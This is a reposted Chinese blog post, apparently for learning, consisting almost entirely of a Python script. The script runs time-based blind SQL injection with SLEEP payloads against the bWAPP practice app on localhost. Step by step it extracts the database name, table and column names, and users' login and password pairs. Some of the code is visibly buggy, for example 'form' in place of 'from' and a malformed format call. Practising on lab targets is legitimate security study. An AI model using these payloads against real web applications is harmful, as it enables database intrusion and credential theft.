sql注入----sql injection script
2022/7/12 2:20:08
本文主要是介绍sql注入----sql injection script,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
import requests
import time
import yaml
HEADER={
"cookie":"PHPSESSID=mgmbi0f5munhthiqfrvbmg73v1; security_level=0"
}
BASE_URL='http://localhost/bWAPP/app/sqli_15.php'
config_path = "E:/Django/hhPro/yamls/sqlBlindInjection.yaml"
# 读取test.yaml文件
with open(config_path, "r") as file:
data = yaml.load(file.read())
student1 = data["BLINDSQL"]["SQL1"]
#print(student1)
def get_database_name_length(a,b)->int:
count=0
#title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
if a[-1]!="?":
a=a+"?"
for i in range(1,100):
url=a+b.format(i)
start_time = time.time()
print(url)
requests.get(url,headers=HEADER)
if time.time() - start_time > 2:
print("盲注数据库名长度为{}".format(i))
count = i
return count
return count
#获得盲注的数据库长度
def get_database_name()->int:
count=0
#title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(3) -- &action=search
for i in range(1,100):
url=BASE_URL+"?title=Iron Man' AND LENGTH(DATABASE())={} AND SLEEP(2) -- &action=search".format(i)
start_time = time.time()
requests.get(url,headers=HEADER)
if time.time() - start_time > 2:
print("盲注数据库名长度为{}".format(i))
count = i
return count
return count
#获得盲注的数据库名称
def get_database_table(count):
#mmp=get_database_name()
x=""
for i in range(1,count+1):
for m in range(33,127):
url=BASE_URL+"?title=Iron Man' AND ord(mid(DATABASE(),{},1))={} and SLEEP(2) -- &action=search".format(i,m)
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
x=x+chr(m)
print("盲注数据库名长度为{}".chr(m))
break
print("打印数据库名称"+x)
#获得数据库此库下面表数量
def get_table_count()->int:
for i in range(1,100):
url=BASE_URL+"?title=Iron Man' and "+student1+"={}".format(i)+" -- &action=search"
start_time=time.time()
requests.get(url,headers=HEADER)
if time.time()-start_time>2:
count =i
print("打印当前数据库下面表数量{}"+str(count))
break
return count
#获得每个数据库表名的长度
def get_table_counts(counts)->int:
for i in range(counts + 1):
for m in range(1,100):
url=BASE_URL+"?title=Iron Man' and (select length(table_name) from information_schema.tables where table_schema=database() limit {},1)={}" \
" and sleep(2) -- &action=search".format(i,m)
start_time=time.time()
requests.get(url,headers=HEADER)
if time.time()-start_time>2:
print("打印当前表名长度{}".format(m))
get_database_tabless(i, m)
break
return m
#获得所有数据库的表名
def get_database_tabless(index,count):
x=""
for i in range(1,count+1):
for m in range(33,127):
url=BASE_URL+"?title=Iron Man' AND " \
"ascii(substr((select table_name from information_schema.tables " \
"where table_schema=database() limit {},1),{},1))={}" \
" and sleep(2) -- &action=search".format(index,i,m)
#上面的意思是select括号里面,获得表的长度(第一个表),substr('str',1,1)然后来判断第一个表的字符是什么
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
x=x+chr(m)
break
print("打印数据库名称{}" + x)
x=""
return x
#根据打印结果,想需要users表里面的列总数
def get_table_count()->int:
count=0
#select count(column_name) from information_schema.columns where table_name='users' 统计users表中有多少个字段
for i in range(1,100):
url=BASE_URL+"?title=Iron Man' AND (select count(column_name) from information_schema.columns where table_name='users')={} " \
"AND SLEEP(2) -- &action=search".format(i)
start_time = time.time()
requests.get(url,headers=HEADER)
if time.time() - start_time > 2:
print("盲注数据库中users表列数量为:{}".format(i))
count = i
return count
return count
#获得users表中列名的长度
def get_table_nameNumber(count):
for i in range(count+1):
for j in range(100):
url=BASE_URL+"?title=Iron Man' AND (select length(column_name) from information_schema.columns where table_name='users' limit {},1)={} " \
"AND SLEEP(2) -- &action=search".format(i,j)
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
get_column_name_of(i,j)
print("user表,字段长度为{}".format(j))
break
#获取每个字段的名称
def get_column_name_of(index,count):
for i in range(count+1):
for j in range(33,127):
url=BASE_URL+"?title=Iron Man' AND " \
"ascii(substr(select column_name form information_schema.columns where table_name='user'),{},1)={} " \
"AND SLEEP(2) -- &action=search".format(index,i,j)
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
print(chr(j))
break
#获得所需字段的用户名跟密码
def get_username_password():
values=""
for i in range(100):
for j in range(33,127):
url=BASE_URL+"?title=Iron Man' AND ascii(substr((select concat(login,',',password) from users limit 0,1),{},1))={} " \
"AND SLEEP(2) -- &action=search".format(i,j)
start_time = time.time()
requests.get(url, headers=HEADER)
if time.time() - start_time > 2:
values=values+chr(j)
break
print(values)
values=""
备注:盲注的时候一般使用and
if __name__=='__main__':
#get_table_counts(get_table_count())
#get_database_table(get_database_name())
#get_table_counts(get_table_count())
#get_table_count()
#get_table_count()#打印users表中总列数量
get_username_password()#打印需要的日志
userAgent:浏览器访问要求,可以绕过最简单的内容,单引号判断sql注入
这篇关于sql注入----sql injection script的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-05-15PingCAP 黄东旭参与 CCF 秀湖会议,共探开源教育未来
- 2024-05-13PingCAP 戴涛:构建面向未来的金融核心系统
- 2024-05-09flutter3.x_macos桌面os实战
- 2024-05-09Rust中的并发性:Sync 和 Send Traits
- 2024-05-08使用Ollama和OpenWebUI在CPU上玩转Meta Llama3-8B
- 2024-05-08完工标准(DoD)与验收条件(AC)究竟有什么不同?
- 2024-05-084万 star 的 NocoDB 在 sealos 上一键起,轻松把数据库编程智能表格
- 2024-05-08Mac 版Stable Diffusion WebUI的安装
- 2024-05-08解锁CodeGeeX智能问答中3项独有的隐藏技能
- 2024-05-08RAG算法优化+新增代码仓库支持,CodeGeeX的@repo功能效果提升
